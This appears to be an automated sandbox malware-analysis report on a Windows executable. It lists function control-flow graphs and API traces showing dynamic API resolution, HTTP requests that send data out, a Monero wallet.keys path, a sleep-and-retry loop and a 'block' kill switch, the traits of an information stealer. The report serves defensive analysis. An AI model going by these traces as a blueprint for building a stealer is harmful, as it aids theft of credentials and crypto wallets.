                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 ad9f20-ad9f2a 634 ada346-ada3da LoadLibraryA * 8 633->634 635 ad9f30-ada341 GetProcAddress * 43 633->635 636 ada3dc-ada451 GetProcAddress * 5 634->636 637 ada456-ada45d 634->637 635->634 636->637 638 ada526-ada52d 637->638 639 ada463-ada521 GetProcAddress * 8 637->639 640 ada52f-ada5a3 GetProcAddress * 5 638->640 641 ada5a8-ada5af 638->641 639->638 640->641 642 ada5b5-ada642 GetProcAddress * 6 641->642 643 ada647-ada64e 641->643 642->643 644 ada72f-ada736 643->644 645 ada654-ada72a GetProcAddress * 9 643->645 646 ada738-ada7ad GetProcAddress * 5 644->646 647 ada7b2-ada7b9 644->647 645->644 646->647 648 ada7ec-ada7f3 647->648 649 ada7bb-ada7e7 GetProcAddress * 2 647->649 650 ada825-ada82c 648->650 651 ada7f5-ada820 GetProcAddress * 2 648->651 649->648 652 ada922-ada929 650->652 653 ada832-ada91d GetProcAddress * 10 650->653 651->650 654 ada98d-ada994 652->654 655 ada92b-ada988 GetProcAddress * 4 652->655 653->652 656 ada9ae-ada9b5 654->656 657 ada996-ada9a9 GetProcAddress 654->657 655->654 658 adaa18-adaa19 656->658 659 ada9b7-adaa13 GetProcAddress * 4 656->659 657->656 659->658
                                      APIs
                                      • GetProcAddress.KERNEL32(76210000,015350C8), ref: 00AD9F3D
                                      • GetProcAddress.KERNEL32(76210000,01534FC8), ref: 00AD9F55
                                      • GetProcAddress.KERNEL32(76210000,01548FB0), ref: 00AD9F6E
                                      • GetProcAddress.KERNEL32(76210000,01549058), ref: 00AD9F86
                                      • GetProcAddress.KERNEL32(76210000,01549010), ref: 00AD9F9E
                                      • GetProcAddress.KERNEL32(76210000,0154DC28), ref: 00AD9FB7
                                      • GetProcAddress.KERNEL32(76210000,0153A658), ref: 00AD9FCF
                                      • GetProcAddress.KERNEL32(76210000,0154DB98), ref: 00AD9FE7
                                      • GetProcAddress.KERNEL32(76210000,0154DC10), ref: 00ADA000
                                      • GetProcAddress.KERNEL32(76210000,0154DC58), ref: 00ADA018
                                      • GetProcAddress.KERNEL32(76210000,0154DAD8), ref: 00ADA030
                                      • GetProcAddress.KERNEL32(76210000,015351C8), ref: 00ADA049
                                      • GetProcAddress.KERNEL32(76210000,01535188), ref: 00ADA061
                                      • GetProcAddress.KERNEL32(76210000,01534FE8), ref: 00ADA079
                                      • GetProcAddress.KERNEL32(76210000,01535008), ref: 00ADA092
                                      • GetProcAddress.KERNEL32(76210000,0154DAF0), ref: 00ADA0AA
                                      • GetProcAddress.KERNEL32(76210000,0154DD60), ref: 00ADA0C2
                                      • GetProcAddress.KERNEL32(76210000,0153A928), ref: 00ADA0DB
                                      • GetProcAddress.KERNEL32(76210000,01535028), ref: 00ADA0F3
                                      • GetProcAddress.KERNEL32(76210000,0154DC88), ref: 00ADA10B
                                      • GetProcAddress.KERNEL32(76210000,0154DC40), ref: 00ADA124
                                      • GetProcAddress.KERNEL32(76210000,0154DBB0), ref: 00ADA13C
                                      • GetProcAddress.KERNEL32(76210000,0154DD78), ref: 00ADA154
                                      • GetProcAddress.KERNEL32(76210000,01535048), ref: 00ADA16D
                                      • GetProcAddress.KERNEL32(76210000,0154DC70), ref: 00ADA185
                                      • GetProcAddress.KERNEL32(76210000,0154DD90), ref: 00ADA19D
                                      • GetProcAddress.KERNEL32(76210000,0154DB80), ref: 00ADA1B6
                                      • GetProcAddress.KERNEL32(76210000,0154DDA8), ref: 00ADA1CE
                                      • GetProcAddress.KERNEL32(76210000,0154DAC0), ref: 00ADA1E6
                                      • GetProcAddress.KERNEL32(76210000,0154DCA0), ref: 00ADA1FF
                                      • GetProcAddress.KERNEL32(76210000,0154DB08), ref: 00ADA217
                                      • GetProcAddress.KERNEL32(76210000,0154DCD0), ref: 00ADA22F
                                      • GetProcAddress.KERNEL32(76210000,0154DB68), ref: 00ADA248
                                      • GetProcAddress.KERNEL32(76210000,0153FE38), ref: 00ADA260
                                      • GetProcAddress.KERNEL32(76210000,0154DCB8), ref: 00ADA278
                                      • GetProcAddress.KERNEL32(76210000,0154DB20), ref: 00ADA291
                                      • GetProcAddress.KERNEL32(76210000,01535148), ref: 00ADA2A9
                                      • GetProcAddress.KERNEL32(76210000,0154DB38), ref: 00ADA2C1
                                      • GetProcAddress.KERNEL32(76210000,01535168), ref: 00ADA2DA
                                      • GetProcAddress.KERNEL32(76210000,0154DB50), ref: 00ADA2F2
                                      • GetProcAddress.KERNEL32(76210000,0154DBC8), ref: 00ADA30A
                                      • GetProcAddress.KERNEL32(76210000,01535068), ref: 00ADA323
                                      • GetProcAddress.KERNEL32(76210000,015351E8), ref: 00ADA33B
                                      • LoadLibraryA.KERNEL32(0154DBE0,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA34D
                                      • LoadLibraryA.KERNEL32(0154DBF8,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA35E
                                      • LoadLibraryA.KERNEL32(0154DCE8,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA370
                                      • LoadLibraryA.KERNEL32(0154DD00,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA382
                                      • LoadLibraryA.KERNEL32(0154DD18,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA393
                                      • LoadLibraryA.KERNEL32(0154DD30,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA3A5
                                      • LoadLibraryA.KERNEL32(0154DD48,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA3B7
                                      • LoadLibraryA.KERNEL32(0154DE50,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA3C8
                                      • GetProcAddress.KERNEL32(751E0000,01535228), ref: 00ADA3EA
                                      • GetProcAddress.KERNEL32(751E0000,0154DE80), ref: 00ADA402
                                      • GetProcAddress.KERNEL32(751E0000,01548988), ref: 00ADA41A
                                      • GetProcAddress.KERNEL32(751E0000,0154DF28), ref: 00ADA433
                                      • GetProcAddress.KERNEL32(751E0000,01535248), ref: 00ADA44B
                                      • GetProcAddress.KERNEL32(700F0000,0153A6D0), ref: 00ADA470
                                      • GetProcAddress.KERNEL32(700F0000,015354E8), ref: 00ADA489
                                      • GetProcAddress.KERNEL32(700F0000,0153A860), ref: 00ADA4A1
                                      • GetProcAddress.KERNEL32(700F0000,0154DDD8), ref: 00ADA4B9
                                      • GetProcAddress.KERNEL32(700F0000,0154DF70), ref: 00ADA4D2
                                      • GetProcAddress.KERNEL32(700F0000,01535648), ref: 00ADA4EA
                                      • GetProcAddress.KERNEL32(700F0000,01535668), ref: 00ADA502
                                      • GetProcAddress.KERNEL32(700F0000,0154DDC0), ref: 00ADA51B
                                      • GetProcAddress.KERNEL32(753A0000,015355E8), ref: 00ADA53C
                                      • GetProcAddress.KERNEL32(753A0000,015354C8), ref: 00ADA554
                                      • GetProcAddress.KERNEL32(753A0000,0154DDF0), ref: 00ADA56D
                                      • GetProcAddress.KERNEL32(753A0000,0154DEB0), ref: 00ADA585
                                      • GetProcAddress.KERNEL32(753A0000,01535628), ref: 00ADA59D
                                      • GetProcAddress.KERNEL32(76310000,0153A680), ref: 00ADA5C3
                                      • GetProcAddress.KERNEL32(76310000,0153A450), ref: 00ADA5DB
                                      • GetProcAddress.KERNEL32(76310000,0154DF58), ref: 00ADA5F3
                                      • GetProcAddress.KERNEL32(76310000,01535368), ref: 00ADA60C
                                      • GetProcAddress.KERNEL32(76310000,01535388), ref: 00ADA624
                                      • GetProcAddress.KERNEL32(76310000,0153A478), ref: 00ADA63C
                                      • GetProcAddress.KERNEL32(76910000,0154DEC8), ref: 00ADA662
                                      • GetProcAddress.KERNEL32(76910000,015356A8), ref: 00ADA67A
                                      • GetProcAddress.KERNEL32(76910000,015488D8), ref: 00ADA692
                                      • GetProcAddress.KERNEL32(76910000,0154DE08), ref: 00ADA6AB
                                      • GetProcAddress.KERNEL32(76910000,0154DEF8), ref: 00ADA6C3
                                      • GetProcAddress.KERNEL32(76910000,01535688), ref: 00ADA6DB
                                      • GetProcAddress.KERNEL32(76910000,015353A8), ref: 00ADA6F4
                                      • GetProcAddress.KERNEL32(76910000,0154DE38), ref: 00ADA70C
                                      • GetProcAddress.KERNEL32(76910000,0154DF10), ref: 00ADA724
                                      • GetProcAddress.KERNEL32(75B30000,01535608), ref: 00ADA746
                                      • GetProcAddress.KERNEL32(75B30000,0154DEE0), ref: 00ADA75E
                                      • GetProcAddress.KERNEL32(75B30000,0154DF40), ref: 00ADA776
                                      • GetProcAddress.KERNEL32(75B30000,0154DE20), ref: 00ADA78F
                                      • GetProcAddress.KERNEL32(75B30000,0154DE68), ref: 00ADA7A7
                                      • GetProcAddress.KERNEL32(75670000,01535588), ref: 00ADA7C8
                                      • GetProcAddress.KERNEL32(75670000,01535448), ref: 00ADA7E1
                                      • GetProcAddress.KERNEL32(76AC0000,01535348), ref: 00ADA802
                                      • GetProcAddress.KERNEL32(76AC0000,0154DE98), ref: 00ADA81A
                                      • GetProcAddress.KERNEL32(6F4E0000,01535508), ref: 00ADA840
                                      • GetProcAddress.KERNEL32(6F4E0000,015356C8), ref: 00ADA858
                                      • GetProcAddress.KERNEL32(6F4E0000,01535548), ref: 00ADA870
                                      • GetProcAddress.KERNEL32(6F4E0000,0154D9E8), ref: 00ADA889
                                      • GetProcAddress.KERNEL32(6F4E0000,015356E8), ref: 00ADA8A1
                                      • GetProcAddress.KERNEL32(6F4E0000,01535428), ref: 00ADA8B9
                                      • GetProcAddress.KERNEL32(6F4E0000,015353C8), ref: 00ADA8D2
                                      • GetProcAddress.KERNEL32(6F4E0000,01535468), ref: 00ADA8EA
                                      • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00ADA901
                                      • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00ADA917
                                      • GetProcAddress.KERNEL32(75AE0000,0154D880), ref: 00ADA939
                                      • GetProcAddress.KERNEL32(75AE0000,01548908), ref: 00ADA951
                                      • GetProcAddress.KERNEL32(75AE0000,0154D8E0), ref: 00ADA969
                                      • GetProcAddress.KERNEL32(75AE0000,0154DA78), ref: 00ADA982
                                      • GetProcAddress.KERNEL32(76300000,015353E8), ref: 00ADA9A3
                                      • GetProcAddress.KERNEL32(6FE20000,0154D9B8), ref: 00ADA9C4
                                      • GetProcAddress.KERNEL32(6FE20000,01535488), ref: 00ADA9DD
                                      • GetProcAddress.KERNEL32(6FE20000,0154D9D0), ref: 00ADA9F5
                                      • GetProcAddress.KERNEL32(6FE20000,0154D7C0), ref: 00ADAA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 23478cc691b4a7c599f741bc5bef8610d07f1dca6a52c7217e790e66623f71b2
                                      • Instruction ID: dc362a56f792334e1e404d8ff1d5097d8e855ddb34b5d0d160b1c04bada6c093
                                      • Opcode Fuzzy Hash: 23478cc691b4a7c599f741bc5bef8610d07f1dca6a52c7217e790e66623f71b2
                                      • Instruction Fuzzy Hash: 87620BB5638300AFC344DFA8ED889567BB9BB8D701B10961BBA09D3374D735A941CB78
                                      Function 00AC48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 801 ac48d0-ac4992 call adaab0 call ac4800 call adaa50 * 5 InternetOpenA StrCmpCA 816 ac499b-ac499f 801->816 817 ac4994 801->817 818 ac4f1b-ac4f43 InternetCloseHandle call adade0 call aca210 816->818 819 ac49a5-ac4b1d call ad8cf0 call adac30 call adabb0 call adab10 * 2 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adac30 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adac30 call adabb0 call adab10 * 2 InternetConnectA 816->819 817->816 829 ac4f45-ac4f7d call adab30 call adacc0 call adabb0 call adab10 818->829 830 ac4f82-ac4ff2 call ad8b20 * 2 call adaab0 call adab10 * 8 818->830 819->818 905 ac4b23-ac4b27 819->905 829->830 906 ac4b29-ac4b33 905->906 907 ac4b35 905->907 908 ac4b3f-ac4b72 HttpOpenRequestA 906->908 907->908 909 ac4f0e-ac4f15 InternetCloseHandle 908->909 910 ac4b78-ac4e78 call adacc0 call adabb0 call adab10 call adac30 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adac30 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adac30 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adacc0 call adabb0 call adab10 call adac30 call adabb0 call adab10 call adaa50 call adac30 * 2 call adabb0 call adab10 * 2 call adade0 lstrlen call adade0 * 2 lstrlen call adade0 HttpSendRequestA 908->910 909->818 1021 ac4e82-ac4eac InternetReadFile 910->1021 1022 ac4eae-ac4eb5 1021->1022 1023 ac4eb7-ac4f09 InternetCloseHandle call adab10 1021->1023 1022->1023 1025 ac4eb9-ac4ef7 call adacc0 call adabb0 call adab10 1022->1025 1023->909 1025->1021
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AC4965
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC4B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00AE0DDE,00000000,?,?,00000000,?,",00000000,?,0154FD40), ref: 00AC4E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AC4E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AC4E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AC4E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC4EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC4F15
                                      • HttpOpenRequestA.WININET(00000000,0154FCE0,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC4B65
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC4F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: 690bc17fffd8e7323a5e99fbdb1a18608ee69c8f2d021fa0af5fe98f89556c64
                                      • Instruction ID: 407416d8fc94f191b0b2d7be9ece561a313ebc8df22b47ca2d7f6d851a7f4657
                                      • Opcode Fuzzy Hash: 690bc17fffd8e7323a5e99fbdb1a18608ee69c8f2d021fa0af5fe98f89556c64
                                      • Instruction Fuzzy Hash: 5A12EC72910218AACB14EB90DEA6FEEB379BF24300F50459AF14762291DF706F49CB65
                                      Function 00AD5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1090 ad5760-ad57c7 call ad5d20 call adab30 * 3 call adaa50 * 4 1106 ad57cc-ad57d3 1090->1106 1107 ad57d5-ad5806 call adab30 call adaab0 call ac1590 call ad5440 1106->1107 1108 ad5827-ad589c call adaa50 * 2 call ac1590 call ad5510 call adabb0 call adab10 call adade0 StrCmpCA 1106->1108 1124 ad580b-ad5822 call adabb0 call adab10 1107->1124 1134 ad58e3-ad58f9 call adade0 StrCmpCA 1108->1134 1138 ad589e-ad58de call adaab0 call ac1590 call ad5440 call adabb0 call adab10 1108->1138 1124->1134 1139 ad5a2c-ad5a94 call adabb0 call adab30 * 2 call ac16b0 call adab10 * 4 call ac1670 call ac1550 1134->1139 1140 ad58ff-ad5906 1134->1140 1138->1134 1270 ad5d13-ad5d16 1139->1270 1144 ad590c-ad5913 1140->1144 1145 ad5a2a-ad5aaf call adade0 StrCmpCA 1140->1145 1149 ad596e-ad59e3 call adaa50 * 2 call ac1590 call ad5510 call adabb0 call adab10 call adade0 StrCmpCA 1144->1149 1150 ad5915-ad5969 call adab30 call adaab0 call ac1590 call ad5440 call adabb0 call adab10 1144->1150 1164 ad5ab5-ad5abc 1145->1164 1165 ad5be1-ad5c49 call adabb0 call adab30 * 2 call ac16b0 call adab10 * 4 call ac1670 call ac1550 1145->1165 1149->1145 1250 ad59e5-ad5a25 call adaab0 call ac1590 call ad5440 call adabb0 call adab10 1149->1250 1150->1145 1171 ad5bdf-ad5c64 call adade0 StrCmpCA 1164->1171 1172 ad5ac2-ad5ac9 1164->1172 1165->1270 1201 ad5c78-ad5ce1 call adabb0 call adab30 * 2 call ac16b0 call adab10 * 4 call ac1670 call ac1550 1171->1201 1202 ad5c66-ad5c71 Sleep 1171->1202 1179 ad5acb-ad5b1e call adab30 call adaab0 call ac1590 call ad5440 call adabb0 call adab10 1172->1179 1180 ad5b23-ad5b98 call adaa50 * 2 call ac1590 call ad5510 call adabb0 call adab10 call adade0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 ad5b9a-ad5bda call adaab0 call ac1590 call ad5440 call adabb0 call adab10 1180->1275 1201->1270 1202->1106 1250->1145 1275->1171
                                      APIs
                                        • Part of subcall function 00ADAB30: lstrlen.KERNEL32(00AC4F55,?,?,00AC4F55,00AE0DDF), ref: 00ADAB3B
                                        • Part of subcall function 00ADAB30: lstrcpy.KERNEL32(00AE0DDF,00000000), ref: 00ADAB95
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD58F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5AA7
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AD5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5478
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5568
                                        • Part of subcall function 00AD5510: lstrlen.KERNEL32(00000000), ref: 00AD557F
                                        • Part of subcall function 00AD5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00AD55B4
                                        • Part of subcall function 00AD5510: lstrlen.KERNEL32(00000000), ref: 00AD55D3
                                        • Part of subcall function 00AD5510: lstrlen.KERNEL32(00000000), ref: 00AD55FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD59DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00AD5C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: c3ac4bc49035e7a688544a1bbfc811edabe6bf7be45778876d595949a9211736
                                      • Instruction ID: ad4b42bb37de56e593415b59d286255b5fb64278db75ec942cf403019af77846
                                      • Opcode Fuzzy Hash: c3ac4bc49035e7a688544a1bbfc811edabe6bf7be45778876d595949a9211736
                                      • Instruction Fuzzy Hash: 1BE13372A101049ACB14FBB0DE66EED733DAF64340F40855BB54766291EF35AF09CB62
                                      Function 00AD19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1301 ad19f0-ad1a1d call adade0 StrCmpCA 1304 ad1a1f-ad1a21 ExitProcess 1301->1304 1305 ad1a27-ad1a41 call adade0 1301->1305 1309 ad1a44-ad1a48 1305->1309 1310 ad1a4e-ad1a61 1309->1310 1311 ad1c12-ad1c1d call adab10 1309->1311 1312 ad1bee-ad1c0d 1310->1312 1313 ad1a67-ad1a6a 1310->1313 1312->1309 1315 ad1aad-ad1abe StrCmpCA 1313->1315 1316 ad1acf-ad1ae0 StrCmpCA 1313->1316 1317 ad1a85-ad1a94 call adab30 1313->1317 1318 ad1b41-ad1b52 StrCmpCA 1313->1318 1319 ad1ba1-ad1bb2 StrCmpCA 1313->1319 1320 ad1bc0-ad1bd1 StrCmpCA 1313->1320 1321 ad1b63-ad1b74 StrCmpCA 1313->1321 1322 ad1b82-ad1b93 StrCmpCA 1313->1322 1323 ad1afd-ad1b0e StrCmpCA 1313->1323 1324 ad1b1f-ad1b30 StrCmpCA 1313->1324 1325 ad1bdf-ad1be9 call adab30 1313->1325 1326 ad1a99-ad1aa8 call adab30 1313->1326 1327 ad1a71-ad1a80 call adab30 1313->1327 1348 ad1aca 1315->1348 1349 ad1ac0-ad1ac3 1315->1349 1350 ad1aee-ad1af1 1316->1350 1351 ad1ae2-ad1aec 1316->1351 1317->1312 1333 ad1b5e 1318->1333 1334 ad1b54-ad1b57 1318->1334 1339 ad1bbe 1319->1339 1340 ad1bb4-ad1bb7 1319->1340 1342 ad1bdd 1320->1342 1343 ad1bd3-ad1bd6 1320->1343 1335 ad1b76-ad1b79 1321->1335 1336 ad1b80 1321->1336 1337 ad1b9f 1322->1337 1338 ad1b95-ad1b98 1322->1338 1329 ad1b1a 1323->1329 1330 ad1b10-ad1b13 1323->1330 1331 ad1b3c 1324->1331 1332 ad1b32-ad1b35 1324->1332 1325->1312 1326->1312 1327->1312 1329->1312 1330->1329 1331->1312 1332->1331 1333->1312 1334->1333 1335->1336 1336->1312 1337->1312 1338->1337 1339->1312 1340->1339 1342->1312 1343->1342 1348->1312 1349->1348 1352 ad1af8 1350->1352 1351->1352 1352->1312
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00AD1A15
                                      • ExitProcess.KERNEL32 ref: 00AD1A21
                                      Strings
                                      Memory Dump Source
